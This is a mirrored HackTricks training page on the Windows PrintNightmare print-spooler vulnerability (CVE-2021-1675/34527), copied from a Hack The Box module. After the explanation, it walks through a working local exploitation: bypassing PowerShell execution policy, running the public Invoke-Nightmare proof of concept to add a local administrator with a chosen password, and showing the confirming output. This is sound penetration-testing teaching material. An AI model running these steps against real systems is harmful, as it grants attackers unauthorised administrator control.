mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-19 01:24:50 +00:00
114 lines
8 KiB
Markdown
114 lines
8 KiB
Markdown
# PrintNightmare
|
|
|
|
<details>
|
|
|
|
<summary><strong>HackTricks in </strong><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|
|
|
|
**This page was copied from** [**https://academy.hackthebox.com/module/67/section/627**](https://academy.hackthebox.com/module/67/section/627)****
|
|
|
|
`CVE-2021-1675/CVE-2021-34527 PrintNightmare` is a flaw in [RpcAddPrinterDriver](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-rprn/f23a7519-1c77-4069-9ace-a6d8eae47c22) which is used to allow for remote printing and driver installation. \
|
|
This function is intended to give **users with the Windows privilege `SeLoadDriverPrivilege`** the ability to **add drivers** to a remote Print Spooler. This right is typically reserved for users in the built-in Administrators group and Print Operators who may have a legitimate need to install a printer driver on an end user's machine remotely.
|
|
|
|
The flaw allowed **any authenticated user to add a print driver** to a Windows system without having the privilege mentioned above, allowing an attacker full remote **code execution as SYSTEM** on any affected system. The flaw **affects every supported version of Windows**, and being that the **Print Spooler** runs by default on **Domain Controllers**, Windows 7 and 10, and is often enabled on Windows servers, this presents a massive attack surface, hence "nightmare."
|
|
|
|
Microsoft initially released a patch that did not fix the issue (and early guidance was to disable the Spooler service, which is not practical for many organizations) but released a second [patch](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) in July of 2021 along with guidance to check that specific registry settings are either set to `0` or not defined. 
|
|
|
|
Once this vulnerability was made public, PoC exploits were released rather quickly. **** [**This**](https://github.com/cube0x0/CVE-2021-1675) **version** by [@cube0x0](https://twitter.com/cube0x0) can be used to **execute a malicious DLL** remotely or locally using a modified version of Impacket. The repo also contains a **C# implementation**.\
|
|
This **** [**PowerShell implementation**](https://github.com/calebstewart/CVE-2021-1675) **** can be used for quick local privilege escalation. By **default**, this script **adds a new local admin user**, but we can also supply a custom DLL to obtain a reverse shell or similar if adding a local admin user is not in scope.
|
|
|
|
### **Checking for Spooler Service**
|
|
|
|
We can quickly check if the Spooler service is running with the following command. If it is not running, we will receive a "path does not exist" error.
|
|
|
|
```
|
|
PS C:\htb> ls \\localhost\pipe\spoolss
|
|
|
|
|
|
Directory: \\localhost\pipe
|
|
|
|
|
|
Mode LastWriteTime Length Name
|
|
---- ------------- ------ ----
|
|
spoolss
|
|
```
|
|
|
|
### **Adding Local Admin with PrintNightmare PowerShell PoC**
|
|
|
|
First start by [bypassing](https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/) the execution policy on the target host:
|
|
|
|
```
|
|
PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process
|
|
|
|
Execution Policy Change
|
|
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
|
|
you to the security risks described in the about_Execution_Policies help topic at
|
|
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
|
|
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A
|
|
```
|
|
|
|
Now we can import the PowerShell script and use it to add a new local admin user.
|
|
|
|
```powershell
|
|
PS C:\htb> Import-Module .\CVE-2021-1675.ps1
|
|
PS C:\htb> Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
|
|
|
|
[+] created payload at C:\Users\htb-student\AppData\Local\Temp\nightmare.dll
|
|
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_am
|
|
d64_ce3301b66255a0fb\Amd64\mxdwdrv.dll"
|
|
[+] added user hacker as local administrator
|
|
[+] deleting payload from C:\Users\htb-student\AppData\Local\Temp\nightmare.dll
|
|
```
|
|
|
|
### **Confirming New Admin User**
|
|
|
|
If all went to plan, we will have a new local admin user under our control. Adding a user is "noisy," We would not want to do this on an engagement where stealth is a consideration. Furthermore, we would want to check with our client to ensure account creation is in scope for the assessment.
|
|
|
|
```
|
|
PS C:\htb> net user hacker
|
|
|
|
User name hacker
|
|
Full Name hacker
|
|
Comment
|
|
User's comment
|
|
Country/region code 000 (System Default)
|
|
Account active Yes
|
|
Account expires Never
|
|
|
|
Password last set ?8/?9/?2021 12:12:01 PM
|
|
Password expires Never
|
|
Password changeable ?8/?9/?2021 12:12:01 PM
|
|
Password required Yes
|
|
User may change password Yes
|
|
|
|
Workstations allowed All
|
|
Logon script
|
|
User profile
|
|
Home directory
|
|
Last logon Never
|
|
|
|
Logon hours allowed All
|
|
|
|
Local Group Memberships *Administrators
|
|
Global Group memberships *None
|
|
The command completed successfully.
|
|
```
|
|
|
|
<details>
|
|
|
|
<summary><strong>HackTricks in </strong><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|